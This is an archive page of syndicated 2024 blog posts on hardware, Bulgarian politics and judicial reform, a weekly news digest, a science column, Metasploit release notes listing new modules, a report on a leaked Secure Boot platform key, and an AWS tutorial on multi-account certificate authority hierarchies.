Yearly Archives: 2024

SilverStone XE360-4677 360mm All-in-One Liquid Cooler for LGA4677

Post Syndicated from John Lee original https://www.servethehome.com/silverstone-xe360-4677-360mm-all-in-one-liquid-cooler-for-lga4677/

In our SilverStone XE360-4677 quick look, we see what this 360mm all-in-one liquid cooler for LGA4677 offers

The post SilverStone XE360-4677 360mm All-in-One Liquid Cooler for LGA4677 appeared first on ServeTheHome.

За правомощията на главния прокурор и правовата държава

Post Syndicated from Bozho original https://blog.bozho.net/blog/4334

Главният прокурор има две правомощия, които опитахме да отменим, които се прилагат спрямо дейността на всички прокурори.
1) надзор за законност
2) методическо ръководство

Чрез тези правомощия главният прокурор може да се меси във всяко наказателно производство и да казва на всички прокурори какво да правят, без това да подлежи на контрол.

Вместо методическото ръководство, предложихме методически правила, които подлежат на обжалване.

Премахвайки надзора за законност, оставихме вътрешния контрол за законосъобразност, при който висшестоящи прокуратури контролират актовете на низшестоящи – както горните съдебни инстанции контролират долните.

Според Конституционния съд, без двете правомощия в техния безконтролен вид, не можело да се гарантира законосъобразното функциониране на прокуратурата. Цитат от мотивите:

„нито едно от тях самò по себе си не може да служи като пълноценна гаранция за законосъобразното функциониране на прокуратурата без наличието на другото“

Аз намирам това заключение за скандално и опасно. Изпълнителната власт, напр., не е така централизирана. Всеки министър има правомощия, дадени от законите, като министър-председателят не може да му се меси. Министерският съвет, като колективен орган, може да отменя неправилни актове на министри, но не и премиерът еднолично. Почти всички актове пък подлежат на съдебен контрол.

Председателите на върховните съдилища, слава Богу, не могат да се месят в работата на съдебните състави.

И какво излиза – всички държавни органи могат да действат законосъобразно без да са свръхцентрализирано-безконтролни, само прократурата не може. При все че основните рискове за правата на гражданите подлежат на потвърждаване от съда – мерките за процесуална принуда (напр. задържане), изземване, СРС (подслушване), т.е. няма нужда главният прокурор да е гарантЪТ срещу злоупотреби.

Не е нормално да се твърди, че това е в основата на конституционния ни модел. Тази постановка на нещата противоречи на принципите на правовата държава, защото казва „без пълна централизация на прокуратурата под главния прокурор, тя ще действа незаконосъобразно“.

Вместо механизмите за взаимен контрол, присъщи за правовата държава, има механизми за абсолютна власт, присъщ на тоталитарните държави. Неслучайно тази структура на прокуратурата и фигурата на главния прокурор на конституционно ниво се появяват в димитровската конституция.

Въпреки всичко, няма да се откажем от опитите да имаме истинска правова държава, защото тя е условието за благосъстояние.

Материалът За правомощията на главния прокурор и правовата държава е публикуван за пръв път на БЛОГодаря.

Седмицата (22–27 юли)

Post Syndicated from Йовко Ламбрев original https://www.toest.bg/sedmitsata-22-27-yuly-2024/

Седмицата (22–27 юли)

Тази политическа седмица започна още миналия уикенд, когато Джо Байдън оттегли кандидатурата си за нов президентски мандат, отваряйки вратата за нова динамика на събитията в САЩ, но и по света. Включително у нас, където политическата криза е омръзнала на всички с устойчивостта си и с почти пълната липса на рационални опции за излизане от нея.

Къде да търсим решението, е темата на анализа на Емилия Милчева. А простичкият отговор е да престанем със запалянковщината и да се върнем към политиката. Според Емилия е крайно време партиите да се изправят пред избирателите и да декларират ясно какво точно мислят да правят и как. Прочетете тазседмичния ѝ текст.

През седмицата беше обявен новият доклад на Европейската комисия за върховенството на закона, в който в частта си за България се изрази подкрепа за поправките в Конституцията, гласувани от предходното Народно събрание като част от правосъдната реформа у нас. Подкрепа изключително важна в момент, когато тези поправки висяха на косъм в Конституционния съд – до петък, когато по-голямата част от тях бяха отменени. Оцеля обаче новият модел за формиране на служебен кабинет.

Междувременно правителството на служебния премиер Димитър Главчев – първото конфигурирано съгласно новия процес – продължава да демонстрира без свян зависимостите си. Теза, декларирана дори от последователите на Доган. Правителството, разбира се, отрече, твърдейки че спазва Конституцията.

В доклада на ЕК се изразява тревога и за медийната свобода. На този фон у нас се налага Асоциацията на европейските журналисти да сигнализира прокуратурата след разкритията, че изпълнителният директор на т.нар. културно-исторически комплекс „Исторически парк“ Ивелин Михайлов е поръчал на шеф на охранителна фирма „да се справи“ с журналиста Йоан Запрянов. Защото явно прокуратурата не преценява за нужно да се самосезира.

А ако сте пропуснали, миналата седмица в петък, 19 юли, на заседанието на Временната парламентарна комисия за проверка на факти и обстоятелства за извършени престъпления във връзка с дейността на Ивелин Михайлов и „Исторически парк“ не счетоха за нужно да участват нито представители на прокуратурата, нито на Министерството на вътрешните работи, нито на Държавна агенция „Национална сигурност“ (ДАНС). Широко затворени очи. Във връзка с това Българският хелзинкски комитет реагира с отворено писмо.

Преди време обещахме да следим казуса #chatcontrol и усилията на организацията „Електронна граница – България“ и на Богомил Шопов да изяснят и променят държавната позиция по този въпрос, която, оказа се, е тотално неадекватна и двусмислена – едновременно отхвърляме отслабването на криптирането и подкрепяме белгийското предложение, което е за отслабване. Ако и вие не споделяте тази раздвоена позиция, може да подкрепите апелa България да застане твърдо против отслабване на криптирането за лични комуникации.

В този контекст ми се иска да припомня един стар текст от самото начало на „Тоест“, който явно трябва да бъде четен отново и отново. И най-вече от нашите представители и евродепутати. Текстът е със заглавие „И да няма какво да криеш, има какво да пазиш“ и е от рубриката ни „Аз, киборгът“.

През март публикувахме интервю със саудитския дисидент Абдулрахман ал-Халиди, който от две години и половина е затворен в Центъра за задържане на чужденци в Бусманци. Преди 20 дни той обяви гладна стачка в знак на протест срещу отношението към него и принудителното му задържане въпреки съдебно решение на ВАС, че следва да бъде освободен. Светла Енчева взе второ интервю от него по този повод, което публикувахме през седмицата.

Представяйки ви и този случай, и следващия от поредицата интервюта с руски бежанци на Николета Атанасова, изпитвам истински срам за държавата, в която живеем. Заради това, което дребнодушието на българския бюрократ причинява на хората – в страната, възродена преди почти 150 години от идеалите за „чиста и свята република“, където „всичките народи в нея щат живеят под едни чисти и святи закони“.

„Никога не съм се чувствал толкова унизен“, споделя и Данила Бабенко. Той е руснак, потърсил убежище у нас от войната на Путин в Украйна заради нежеланието си да воюва, заради опасенията, че ще бъде преследван след критиките си към режима в Русия, и заради сексуалната си ориентация. Неговата история е част от поредицата „Пет отровни дела“ на Николета.

И някак тук ми се струва добре да ви препоръчам да прочетете нашето ново стихотворение на месеца. Заглавието му е „Тънките хора“ и е на американската писателка и поетеса Силвия Плат. Преводът е на Румен Павлов, на когото ще дължим и излизането на български на двете най-популярни стихосбирки на авторката, които се очаква да се появят през следващата година с логото на Издателство за поезия ДА.

Смъртта обикновено не е лесна за обговаряне тема. И това е обяснимо, защото загубата е завинаги, случилото се – непоправимо, а травмата се преодолява трудно. Но разговорът на Надежда Цекулова с д-р Бояна Петкова няма за цел да натежава – напротив, опитва се тихо да подскаже възможни начини за облекчаване на страданието, различни от тишината на мълчанието. Намерете малко време насаме със себе си и прочетете „Разговори за смъртта. Какво правим преди и какво правим след загубата“.

А като написах обговаряне… заглавието на най-новата статия на Павлина Върбанова от поредицата „Порция език“ е „За какво служат (понякога) представките и наставките?“. Тя обяснява защо наличието или липсата им ни се струват странни и се опитва да ни успокои, че макар и формално погрешни, някои опити да поправим усещането за недодяланост не са непременно с погрешни мотиви.

Новата серия научни новини от Михаил Ангелов този път започва с порции синтетично месо (за нас или поне за домашните ни любимци) и продължава с идеи как да произвеждаме торове, биопетрол и други допълнителни продукти от отпадъци. Статията завършва с неотдавнашно откритие за източник на кислород в океана – електрически източник с потенциал, който може да ни провокира да съсипем природата на планетата си още по-бързо.

А като заговорихме за храна и за съсипването на природата ни… не пропускайте да гледате документалната поредица Omnivore по Apple TV+, където Рене Редзепи, съсобственик и главен готвач на отличения с три звезди „Мишлен“ ресторант Noma в Копенхаген, разказва за няколко основни продукта, които са оформили кулинарната култура на човечеството през вековете, ритуалите, свързани с нея, и дори самото ни съществуване.

Всъщност Редзепи се опитва да събуди човечността ни от ступора на будната кома, в която сме я изоставили. Филмът е удивителен и от кинематографична гледна точка – прекрасно е заснет. Наистина не го пропускайте! Иначе, omnivore на български език следва да се преведе като организъм, който се храни както с растения, така и с месо – тоест всеяден.

Но преди да се затичате към телевизора, нека отново напомним, че „Тоест“ съществува заради вас, нашите читатели, вече седма година. Създаваме качествено съдържание благодарение на вашите дарения и подкрепа. Затова, ако четете и харесвате публикациите ни, но още не сте наш дарител, подкрепете ни. Ако за вас е важно гласът на „Тоест“ и на екипа ни да продължава да се чува в родното медийно пространство, разкажете за нас на свои познати и приятели, които може би също ще оценят усилията ни.

Станете редовен дарител

И само още нещо… Екипът на проекта „О, спомняте ли си“ подготвя нова книга. Автор на снимките в нея е Иван Григоров, който е подбрал от архива си непоказвани досега кадри от масовото изселване на етническите турци от България през 1989 г. А текстовете в книгата „О, спомняте ли си Лейля“, в които са представени историята, причините и последствията от тогавашните събития, ще бъдат дело на Антонина Желязкова и Румен Аврамов.

Миналата година екипът е получил отказ от държавата да финансира проекта, затова той се осъществява с помощта на дарения от български граждани и Центъра за академични изследвания и благодарение на издателство „Рива“. Екипът още събира лични истории на участници в онези събития. Ако имате какво да разкажете или познавате хора, които биха го направили, може да го споделите с авторите на проекта на български или турски език.

Благодарим ви, че сме заедно. Хубав уикенд и приятно четене!

Metasploit Weekly Wrap-Up 07/26/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/07/26/metasploit-weekly-wrap-up-41/

New module content (3)

Magento XXE Unserialize Arbitrary File Read

Metasploit Weekly Wrap-Up 07/26/2024

Authors: Heyder and Sergey Temnikov
Type: Auxiliary
Pull request: #19304 contributed by heyder
Path: gather/magento_xxe_cve_2024_34102
AttackerKB reference: CVE-2024-34102

Description: This adds an auxiliary module for an XXE which results in an arbitrary file in Magento which is being tracked as CVE-2024-34102.

Ghostscript Command Execution via Format String

Authors: Christophe De La fuente and Thomas Rinsma
Type: Exploit
Pull request: #19313 contributed by cdelafuente-r7
Path: multi/fileformat/ghostscript_format_string_cve_2024_29510
AttackerKB reference: CVE-2024-29510

Description: This adds an exploit module targeting CVE-2024-29510, a format string vulnerability in Ghostscript versions before 10.03.1 to achieve a SAFER sandbox bypass and execute arbitrary commands.

Softing Secure Integration Server v1.22 Remote Code Execution

Authors: Chris Anastasio (muffin) of Incite Team, Imran E. Dawoodjee [email protected], and Steven Seeley (mr_me) of Incite Team
Type: Exploit
Pull request: #19084 contributed by ide0x90
Path: windows/http/softing_sis_rce
CVE reference: ZDI-22-1156

Description: This adds a module targeting CVE-2022-1373 and CVE-2022-2334 as an exploit chain against Softing Secure Integration Server 1.22.

Enhancements and features (2)

  • #19338 from adfoster-r7 – Improves error handling and progress tracking in the auxiliary/gather/kerberos_enumusers and gather/asrep modules.
  • #19340 from adfoster-r7 – Improve setg SessionLogging support to work with command shells, as well as allowing logging to be turned on/off at any point – not just for newly created sessions.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 07/26/2024

Научни новини: Гастрофутуризъм, торове от отпадъци и изненади от морските дълбини

Post Syndicated from Михаил Ангелов original https://www.toest.bg/nauchni-novini-gastrofuturizum-torove-ot-otpadutsi-i-iznenadi-ot-morskite-dulbini/

Гастрофутуризъм за домашните любимци

Научни новини: Гастрофутуризъм, торове от отпадъци и изненади от морските дълбини

Производството на месо във фабрики е една от технологиите, които са като извадени от научната фантастика. Вместо да бъдат отглеждани животни, се вземат няколко клетки, които впоследствие се култивират в биореактори с всички хранителни вещества, нужни за развитието им. Така производството на протеин става по-хуманно и по-щадящо за околната среда. Животновъдството е отрасъл, който консумира големи количества вода както пряко, така и косвено – за отглеждане на фуража, с който се хранят животните.

Отглеждането на самите клетки е сравнително лесно – учените имат опит с инвитро култури от десетилетия. По-трудната задача е имитацията на истинско месо, тъй като то е смес от различни видове тъкани, преплетени по специфичен начин. Изглежда, че точно това препъва стартъп компаниите, които преди няколко години попаднаха под светлините на прожекторите, след като получиха одобрение за продажба на продуктите си в Сингапур и САЩ. В средата на миналата година американската Upside Food обяви първата си продажба в рамките на сътрудничество с ресторанта Bar Crenn, който има звезда „Мишлен“. Освен че това е първата продажба на подобен тип продукт, тя отбеляза и завръщането на месото в менюто на ресторанта след петгодишна пауза.

Съвместната работа не продължи дълго и приключи в началото на тази година. С това ефективно изчезна и възможността за купуване на лабораторно отгледано месо както в САЩ, така и в Сингапур. Според разследване на WIRED вкусът на продукта е бил много добър, но производството му е изключително времеемко и скъпо. Към момента стъпката с отглеждане на многослойна тъкан в биореактор все още не е направена. Поради това компанията се е спряла на подход, който налага култивирането на слоеве клетки в отделни съдове, след което те се комбинират в продукт, наподобяващ пилешка пържола. Освен многото ръчен труд се използва и огромно количество пластмаса за еднократна употреба, а това поставя под въпрос екологичните заявки на производството. Количеството отпадна пластмаса, генерирано при отглеждането на клетките, може да бъде над десет пъти повече от полученото месо.

Предлагането на „пържола“ вместо продукт, наподобяващ мляно месо, като кренвирши и пилешки хапки, е много по-впечатляващо, което обяснява високите цели, поставени от компаниите. Но това може да се окаже проблем за тях, защото обещанията, дадени преди години, най-вероятно няма да се материализират скоро, което може да доведе до натиск от инвеститорите.

Не е ясно и какви ще бъдат нагласите към лабораторно отгледаното месо. Според проучване с участници от САЩ и Германия негативните мнения се базират основно на недоверие в технологията и на приемането ѝ за неестествена. Скептицизъм предизвиква и представянето на продукта като „високотехнологичен“. Това най-вероятно се дължи на предпочитанията на повечето потребители храната им да бъде традиционна и „като от едно време“. Донякъде изненадващо, не е установена силна връзка между положителните нагласи към такова месо и ползите от него за околната среда и по-хуманното отношение към животните. Тези резултати показват, че индустрията за синтетично месо трябва да обърне сериозно внимание на маркетинговата си стратегия, преди да започне да убеждава потребителите, че продуктите ѝ са добра алтернатива на конвенционалните.

Но ако някои потребители се мръщят на кренвирши, произведени в епруветка, други са абсолютно непретенциозни и биха ги яли с ентусиазма, с който подхождат към случайно намерени пилешки кокали и парчета дюнер.

Това отваря поле за компании като английската Meatly, която в началото на месеца получи одобрение за продажба на лабораторно отгледано месо, което да се влага в храни за домашни любимци. От компанията обявяват, че първата такава храна ще е кучешка и най-вероятно ще е достъпна за потребителите до края на годината. Произвежданите обеми в началото ще са малки и продуктите с месо от Meatly ще са по-скоро бутикови. Компанията планира да увеличи производството до индустриални количества в идните две-три години, което би трябвало да намали цената им. Рецептата за храните, подобно на много от достъпните към момента, ще бъде смес – около 5% маса от птичи клетки в комбинация с растителни протеини, зърнени продукти и др.

Част от стратегията на компанията е да заложи на оптимизация на всички етапи от процеса, така че да намали възможно най-много разходите. Например специално разработената хранителна среда, в която се отглеждат клетките, е неколкократно по-евтина от обичайно използваните. Също така с изключение на клетките, взети от кокоше яйце и дали начало на производството, в продукта не се влага нищо друго с животински произход.

Така ефективно домашните любимци могат да получат животински протеин без екологичния и морален отпечатък на животновъдството. Въпреки че в глобален мащаб това не е сериозен фактор, в развитите държави не е съвсем така – в САЩ кучетата изяждат почти 18% от животновъдното производство. С напредъка на технологията, ако компаниите успеят да увеличат количествата биомаса, която отглеждат, може този процент да спадне значително, като така домашните ни любимци ще могат да се хранят с етично добито месо.

По-слабо регулираният биотехнологичен сектор е един от малкото успехи, които могат да се припишат на Брекзит. В това отношение Европа е изключително консервативна и както проличава от дебата за генетичните редакции, който се води и в обществото, и в Европейската комисия (ЕК), има риск да изостане в това ключово поле за иновации. ЕК все още няма ясно мнение относно синтетичното месо, но темата вече се обсъжда.

На този фон в края на миналата година в Италия беше приет закон за пълна забрана на отглеждането и продажбата на синтетично месо. Това стана в разрез с европейското законодателство, според което местните закони, които могат да имат ефект върху общия пазар, трябва да минат през одобрителна процедура. Италианският министър на земеделието Франческо Лолобриджида е коментирал, че синтетичното месо застрашава хилядолетните традиции на италианската кухня и животновъдство. В типичния за партиите от десния спектър език той е определил Италия като „първата страна в света, защитена от социалната и икономическа заплаха на синтетичната храна“. Забраната получава значителна подкрепа от животновъдите – сектор, който ще бъде сериозно засегнат, ако тези продукти добият широка популярност.

Предвид настроенията на потребителите, към момента не е ясно кога и дали ще се случи това. Най-вероятно ще се намери баланс между двете мнения, но докато се стигне до този момент, предстоят дълга и разгорещена полемика и немалко технологични предизвикателства.

Торове от отпадъци

Съвременното земеделие би било невъзможно без производството на големи количества торове. В основата си то е базирано на петролната промишленост, което, въпреки че позволява да бъдат изхранени милиарди, има роля за задълбочаването на проблемите с климата. Поради тази причина създаването на нови технологии за производство на торове е поле, в което се инвестират значителни ресурси.

Нова технология може да разшири един от подходите за преизползване на органични отпадъци, които се подлагат на процес за хидротермално втечняване посредством висока температура и налягане с добавяне на вода и основни вещества. Така биомасата се превръща в субстанция, сходна на суров петрол. Изходната суровина може да бъде разнообразна – свински тор, хранителни и растителни отпадъци. Основите на технологията са поставени в началото на миналия век, но оттогава тя е доразвита и усъвършенствана.

При производството на биопетрол се получават и немалки количества замърсена вода, която обикновено се третира като отпадък и се обработва в пречиствателни станции. В нея има хранителни вещества, които не са във вид, пряко достъпен за растенията, но могат да се обработят, така че от тях да се получи тор. Скорошни разработки на Университета на Илинойс в Ърбана-Шампейн показват начини за използването на тази вода, с което се намаляват отпадъците от производството на биопетрол и се дава възможност за създаване на кръгова икономика.

Възможен метод за превръщане на хранителните вещества във водата във форма, подходяща за усвояване от растенията, е използването на микроорганизми, които да обработят сложните молекули до по-прости. Източник на такива микроорганизми би могла да е водата от аквапонните стопанства. Това производство е сходно на хидропонното, при което растенията се отглеждат в течна хранителна среда, но при него в течността се отглеждат и риби. Получената екосистема е добре позната на акваристите – отпадъците, които рибите отделят, както и неизядената храна се обработват от различни бактерии, живеещи в субстрата на аквариума под формата на биофилм. Бактериите в него, незаменима част от азотния цикъл, произвеждат съединения, които подхранват растенията.

Идеята на една от разработките е да се смеси отпадната вода от хидротермалното втечняване с вода от аквапонните системи, като се използва микрофлората в нея, за да освободи хранителните вещества. След изпитването на 32 различни съотношения екипът е установил, че в смес, съдържаща 8% от отпадните води, могат да покълнат семена на маруля – често оглеждано растение в хидропонни системи. Към момента няма показания, че сместа действа като тор в по-късните степени на развитие на растенията, но това не обезкуражава учените. Намаляването на количеството отпадни води, които трябва да преминат през пречиствателни станции, е добро постижение, тъй като помага да се намалят също разходите и енергията за обработката на водите.

Друг възможен подход е използването на гъбата пъстър траметес. С нейна помощ азотсъдържащите съединения се разграждат до прости вещества, като амоняк и нитрати. Само за няколко дни гъбата повишава значително концентрацията на амоняк и нитрати в 5% разтвор на отпадни води от хидротермално втечняване, като нитратите се покачват осем пъти. За оптимизация на реакцията към гъбата са добавени и нитрифициращи бактерии. Те имат свойството да преобразуват амоняка в нитрати, които са предпочитаният азотен източник за растенията. Вследствие на това концентрацията им в разтвора се покачва 17 пъти, което е впечатляващ резултат. От използването на гъбата има и допълнителна полза – тя отделя ензими от групата на лакказите, които имат способността да инактивират различни токсични вещества, съдържащи се в отпадните води.

Ако технологията се развие, така че да може да се използва в индустриални мащаби, това ще позволи изграждането на мощности близо до местата, където се генерират биологични отпадъци, които първо да произвеждат биопетрол с помощта на хидротермално втечняване, а след това от отпадните води от процеса и допълнителни продукти. Така ще се затвори производството и ще се намали необходимостта от транспортиране на отпадните продукти.

Изненада в дълбините

За да съществува многоклетъчен живот на планетата ни, трябва да са изпълнени няколко условия, едно от които е наличието на кислород. 

Макар да сме приели, че „белите дробове на планетата“ са тропическите гори, те не са единственият, а най-вероятно не са и основният източник на кислород в атмосферата. Счита се, че между 50 и 70% от кислорода се отделят от фотосинтезиращи организми, които живеят в Световния океан. Според приетата към момента хипотеза повишаването на концентрацията му в атмосферата се дължи на появата и разпространението на фотосинтезата преди около 1 милиард години. Въпреки че са познати и други процеси, които могат да генерират газа, като разграждане на вода, въглероден диоксид или серен диоксид под влиянието на различни източници на енергия, например електричество или UV лъчи, те обикновено протичат в доста негостоприемни условия.

Ново откритие показва, че в океаните има източник на кислород, за който не сме знаели до момента. Първите наблюдения на феномена са направени още през 2013 г., но тогава учените са решили, че става въпрос за грешка при измерването. След като резултатите продължават да се повтарят, измерванията са повторени и с друг метод. Данните недвусмислено показват, че е открит процес, който може да промени разбиранията ни за възникването на живот на нашата планета и откриването му на други.

Обследвайки полето Кларион–Клипертон, намиращо се в Тихия океан, между Мексико и Хавайските острови, изследователите виждат покачване на нивата на кислород, което не е характерно и не се наблюдава в други области на океана. Тъй като измерванията се правят на дълбочина 4–5 километра, източникът не може да е фотосинтетичен – светлината не прониква на такава дълбочина.

След обсъждане на възможните хипотези учените се спират на полиметалните конкреции, на които тази област е много богата. В тези образувания с размер, вариращ от микроскопичен до около 20 см, се съдържат най-различни метали – кобалт, никел, мед, манган. Процесът на формирането им започва с малко парченце черупка, камък или друг обект, по който започват да се наслояват разтворените в океанската вода метали. В течение на милиони години отлаганията се натрупват и размерът на конкрециите нараства.

Текущата хипотеза е, че благодарение на различните метали в конкрециите те функционират като слаба батерия. Това е потвърдено лабораторно – учените са измерили напрежение, достигащо 0,95 волта. В солената вода на океана за разделяне на водната молекула са нужни около 1,5 волта, колкото е напрежението на батериите в дистанционното за телевизора. И точно както в това устройство, най-вероятно, когато конкрециите са близо една до друга, те се свързват последователно и увеличават напрежението си. Така те работят като своеобразна „геобатерия“, която може да освободи кислорода от водната молекула. Все още не е ясно дали процесът протича като при стандартната електролиза, където освен кислорода се отделя и водород. Възможно е електричеството да действа като катализатор на друг процес, който към момента не ни е известен.

Може само да се спекулира дали този новооткрит източник на „тъмен кислород“, както го наричат авторите, е взел участие в кислородната катастрофа, дала начало на нова биологична епоха на планетата. Но е почти сигурно, че има значение за биологичното разнообразие на океанското дъно, където до момента се смяташе, че кислород постъпва само благодарение на океанските течения.

Освен за нашата планета това откритие може да ни даде информация и за далечните планети, които наблюдаваме и по които търсим форми на живот. Доскоро се считаше, че големи количества кислород в атмосферата могат да бъдат индикация за протичаща фотосинтеза. Подводното откритие дава нов механизъм, който може да повлияе на нивата на кислород в атмосферата на дадена планета, без на нея непременно да има живот, но и по начин, който не пречи на вече съществуващ. Това ще затрудни астрономите, които търсят обитаеми и обитавани планети, въпреки че наличието на кислород е само един от параметрите, с които работят.

Именно поради състава си – оптимален за батерия – полиметалните конкреции са и примамлива цел за извличане от океанското дъно. Няколко компании планират да започнат работа през 2025 г., като според тях експлоатацията на тези ресурси е по-екологична и щадяща за природата, отколкото извличането на руди от земната повърхност. Но работата на океанското дъно по-скоро само ще прикрие щетите, които се нанасят върху биосистемите.

В пилотно изследване на ефекта от извличането на подобни конкреции е установено, че образуващите се облаци от седимент имат голямо влияние върху водните обитатели. Година след приключване на събирането броят на плуващи животни в находището спада с 43%, а в зоните около него – с 56%. Най-вероятно тези места стават неподходящи за хранене и животните ги отбягват. С новото откритие, че конкрециите могат да бъдат и голям източник на кислород, щетите върху екосистемите може да се окажат пагубни и в океана да се създадат своеобразни „мъртви зони“. Това най-вероятно ще има каскаден ефект, който ще се отрази както на водните, така и на земните обитатели.

С оглед на рисковете над 800 учени и специалисти от 44 държави са подписали петиция, в която призовават да се спрат сегашните планове за извличане на материал от океанското дъно. Проблемът беше засегнат и в публицистичното предаване Last Week Tonight. Въпреки че в океаните има материали, които могат да осигурят производството на батерии в следващите десетилетия, употребата им може да се окаже изключително късогледо решение, което да допринесе допълнително за ускоряване на климатичните промени и за загубата на екосистеми и видове, които дори още не сме открили.

Compromising the Secure Boot Process

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/07/compromising-the-secure-boot-process.html

This isn’t good:

On Thursday, researchers from security firm Binarly revealed that Secure Boot is completely compromised on more than 200 device models sold by Acer, Dell, Gigabyte, Intel, and Supermicro. The cause: a cryptographic key underpinning Secure Boot on those models that was compromised in 2022. In a public GitHub repository committed in December of that year, someone working for multiple US-based device manufacturers published what’s known as a platform key, the cryptographic key that forms the root-of-trust anchor between the hardware device and the firmware that runs on it. The repository was located at https://github.com/raywu-aaeon/Ryzen2000_4000.git, and it’s not clear when it was taken down.

The repository included the private portion of the platform key in encrypted form. The encrypted file, however, was protected by a four-character password, a decision that made it trivial for Binarly, and anyone else with even a passing curiosity, to crack the passcode and retrieve the corresponding plain text. The disclosure of the key went largely unnoticed until January 2023, when Binarly researchers found it while investigating a supply-chain incident. Now that the leak has come to light, security experts say it effectively torpedoes the security assurances offered by Secure Boot.

[…]

These keys were created by AMI, one of the three main providers of software developer kits that device makers use to customize their UEFI firmware so it will run on their specific hardware configurations. As the strings suggest, the keys were never intended to be used in production systems. Instead, AMI provided them to customers or prospective customers for testing. For reasons that aren’t clear, the test keys made their way into devices from a nearly inexhaustive roster of makers. In addition to the five makers mentioned earlier, they include Aopen, Foremelife, Fujitsu, HP, Lenovo, and Supermicro.

How to build a CA hierarchy across multiple AWS accounts and Regions for global organization

Post Syndicated from Jiaqing Xue original https://aws.amazon.com/blogs/security/how-to-build-a-ca-hierarchy-across-multiple-aws-accounts-and-regions-for-global-organization/

Building a certificate authority (CA) hierarchy using AWS Private Certificate Authority has been made simple in Amazon Web Services (AWS); however, the CA tree will often reside in one AWS Region in one account. Many AWS customers run their businesses in multiple Regions using multiple AWS accounts and have described the process of creating a CA hierarchy to reflect their organizational structure as complex. This blog post guides you through building a two-level CA hierarchy with CAs in multiple Regions and in multiple accounts.

Certificates, like those provided through AWS Private CA, are usually used to establish encrypted network connections to meet security requirements of an organization’s data, such as database connections. For example, a software as a service (SaaS) company headquartered in Singapore that offers managed database services to users across multiple Regions, such as Oregon (us-west-2), Singapore (ap-southeast-1), and Tokyo (ap-northeast-1). To comply with the regulatory requirements of various countries and Regions, the company needs to build a CA hierarchy with a root CA located in Singapore and subordinate CAs distributed globally.

Another example is a large manufacturing company selling millions of Internet of Things (IoT) devices globally that needs to issue certificates to those devices for identity, authentication, and secure network connections. Different device types or business requirements are handled by different teams that have their own independent AWS accounts within the organization. To meet the certificate policy requirements (such as key length, validity period, and so on) for different types of devices, preserve business flexibility, and control the blast radius of risks, these teams use their own CAs to issue certificates. A customer like this needs a CA hierarchy that aligns with its organizational structure. Subordinate CAs should be deployed to the AWS accounts in different business departments, with each department managing its own subordinate CAs. Each device, or end-entity, typically requires a unique certificate, but the number of private certificates each CA will issue is 1,000,000 by default. Because this number is easy to exceed in a mass-production scenario, a CA hierarchy with multiple subordinate CAs can help mitigate this limitation.

In a CA hierarchy, the root CA is responsible for issuing certificates to subordinate CAs, and subordinate CAs are responsible for issuing end-entity certificates. Because the root CA is the root of the trust chain, loss of trust in this CA can mean that the end-entity certificates it issued will become invalid. Therefore, it’s recommended to place the root CA in a dedicated account and apply strict access control and auditing on its usage. We also recommend you strictly limit the scope of use of the root CA. For more best practices, see AWS Private CA best practices and Designing a CA hierarchy.

Key concepts: Certificate template

In AWS Private CA, when you use AWS Command Line Interface (AWS CLI) or AWS APIs to issue a certificate, you need to supply the certificate template Amazon Resource Name (ARN) to specify the X509v3 parameters of the certificate. A certificate template defines what type of certificates can be issued and allows CA administrators to control what certificates are issued and with what attributes. If you provide no ARN, AWS Private CA will automatically apply the EndEntityCertificate/V1 template to issue an end-entity certificate.

AWS Private CA offers certificate templates that encapsulate best practices for the basic constraint values in X509v3 parameters of certificates. For example, if it’s an end-entity certificate, the cA value of Basic constraints in the parameter is False; if issuing a CA certificate, it is necessary to set the cA value in the parameter to True and set the pathLenConstraint according to the level of the CA using this certificate in the CA hierarchy.

When issuing certificates, you must select the appropriate certificate template based on the certificate’s intended purpose. For more information about certificate templates, see Understanding certificate templates.

Journey of a two-level CA hierarchy

Now that you understand the core concepts of a CA hierarchy, we will show you how to use two CAs located in different accounts and different Regions to establish a CA hierarchy and use the subordinate CA to issue an end-entity certificate associated with a web application. In the example, you will create two CAs: one in the Oregon (us-west-2) Region acting as the root CA and the other one in the Singapore (ap-southeast-1) Region acting as the subordinate CA.

The following figure shows what you will build:

Figure 1: Architecture of a two-level CA hierarchy

Figure 1: Architecture of a two-level CA hierarchy

Prerequisites

You need the following prerequisites to build and implement the solution in this post.

  1. Designate two different AWS accounts for creating the hierarchy. In this example, we use one called Root CA account and the another called Subordinate CA account.
  2. Verify that you can sign in to AWS CloudShell in the Root CA account, and verify that your console user or role has the AWS Identity and Access Management (IAM) policy AWSCertificateManagerPrivateCAFullAccess associated or has permissions to create CAs and issue certificates in AWS Private CA.
  3. Verify that you have access to a role in the Subordinate CA account that has appropriate permissions to create CAs in AWS Private CA, issue certificates using AWS Certificate Manager (ACM), and create an Application Load Balancer (ALB) for a sample web application.

Build the hierarchy

With the prerequisites in place, you can start building the hierarchy, including the:

  • Root CA
  • Subordinate CA
  • Subordinate CA certificate
  • End-entity certificate

To build the root CA

  1. In the AWS Management Console of the root CA account, go to AWS Private CA and make sure that you are in the Oregon (us-west-2) Region.
  2. Create a CA according to this guide. Select Root in the CA type options to indicate that it’s a root CA.

    Figure 2: Create root CA

    Figure 2: Create root CA

  3. After creation, the CA will be in Pending certificate status. Finish configuring your CA by choosing Actions and selecting Install CA certificate.

    Figure 3: Root CA in pending certificate status

    Figure 3: Root CA in pending certificate status

  4. The root CA will change to Active status.

    Figure 4: Root CA in active status

    Figure 4: Root CA in active status

To build the subordinate CA

  1. To build the subordinate CA, sign in to your second account designated for this and make sure your Region is different than that of the root CA. For this example, I’m creating this in the Singapore (ap-southeast-1) Region. Similar to the root CA, create a CA in the console and select Subordinate as the CA type options.

    Figure 5: Create a subordinate CA

    Figure 5: Create a subordinate CA

  2. As with the root CA, the subordinate CA is in the Pending certificate state, so you need to install the certificate for it.

    Figure 6: Subordinate CA in pending certificate status

    Figure 6: Subordinate CA in pending certificate status

To issue the subordinate CA certificate

In a CA hierarchy, the certificate of the subordinate CA must be issued by the higher-level CA, which in this case is the root CA. To configure the subordinate CA to be Active, you need to get the certificate signing request (CSR) of the subordinate CA and use the root CA to sign it and issue a certificate for it.

